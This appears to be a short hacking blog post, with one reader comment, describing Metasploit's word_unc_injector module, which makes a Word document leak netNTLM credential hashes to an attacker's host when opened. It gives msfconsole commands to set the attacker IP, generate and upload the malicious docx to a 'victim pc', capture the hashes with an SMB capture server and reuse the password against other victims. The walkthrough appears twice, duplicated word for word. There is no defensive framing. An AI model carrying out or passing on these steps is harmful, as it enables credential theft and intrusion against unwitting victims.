This module modifies a .docx file that will, upon opening, submit stored netNTLM credentials to a remote host. It can also create an empty docx file. If emailed the receiver needs to put the document in editing mode before the remote server will be contacted. Preview and read-only mode do not work. Verified to work with Microsoft Word 2003, 2007 and 2010 as of January 2013. In order to get the hashes the auxiliary/server/capture/smb module can be used.
First Hack the Victim PC Using Metaspolit (click here)
msfconsole
use auxiliary/docx/word_unc_injector
msf exploit (word_unc_injector)>set lhost 192.168.1.2 (IP of Local Host)
msf exploit (word_unc_injector)>exploit
Now we successfully generate the malicious docx File, it will stored on your local computer
/root/.msf4/local/msf.docx
Now use ‘upload ‘command to upload the msf.docx in victim pc using
Upload /root/.msf4/local/msf.docx.
Now use auxiliary/server/capture/smb
msf exploit (smb)>run
When victim open your msf.doc files you will get the password hash after get the victim password hashes, you can try to connect to another victim use the same password
First Hack the Victim PC Using Metaspolit (click here)
msfconsole
use auxiliary/docx/word_unc_injector
msf exploit (word_unc_injector)>set lhost 192.168.1.2 (IP of Local Host)
msf exploit (word_unc_injector)>exploit
Now we successfully generate the malicious docx File, it will stored on your local computer
/root/.msf4/local/msf.docx
Now use ‘upload ‘command to upload the msf.docx in victim pc using
Upload /root/.msf4/local/msf.docx.
Now use auxiliary/server/capture/smb
msf exploit (smb)>run
When victim open your msf.doc files you will get the password hash after get the victim password hashes, you can try to connect to another victim use the same password
1 comment:
I have been hacked by this process. Can I please know how to be out of this hack?
Post a Comment